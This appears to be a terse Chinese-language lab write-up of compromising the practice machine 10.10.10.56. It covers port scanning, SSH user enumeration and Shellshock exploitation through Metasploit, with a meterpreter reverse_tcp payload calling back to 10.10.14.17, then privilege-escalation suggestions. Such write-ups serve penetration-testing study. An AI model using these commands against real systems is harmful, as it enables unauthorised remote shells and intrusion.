80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
1
访问web,是一个单纯的图片,查看源码无发现。
2
目录扫描ing. 两个目录403,未发现其他目录
3
低版本目录枚举:
1 2 3 4 5 6 7 8
ssh -p 2222 root@10.10.10.56
python ssh.py --port 2222 --username root 10.10.10.56 /usr/lib/python2.7/dist-packages/paramiko/rsakey.py:119: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead. algorithm=hashes.SHA1(), /usr/lib/python2.7/dist-packages/paramiko/rsakey.py:99: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead. algorithm=hashes.SHA1(), root is a valid user!
This policyis used toperform remote checks for the Shellshock vulnerability (CVE-2014-6271) via HTTP, FTP, SMTP, telnet, and SIP. SSH credentials can optionally be provided to test for CVE-2014-6271 via SSH and enumerate missing software updates for CVE-2014-6271and CVE-2014-7291.
use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOST 10.10.10.56 set TARGETURI /cgi-bin/user.sh set SRVHOST 10.10.14.17 set SRVPORT 7788 set payload linux/x64/meterpreter/reverse_tcp set target 1 run
background search suggester use post/multi/recon/local_exploit_suggester setSESSION3 run
[+] 10.10.10.56 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable. [+] 10.10.10.56 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable. [+] 10.10.10.56 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.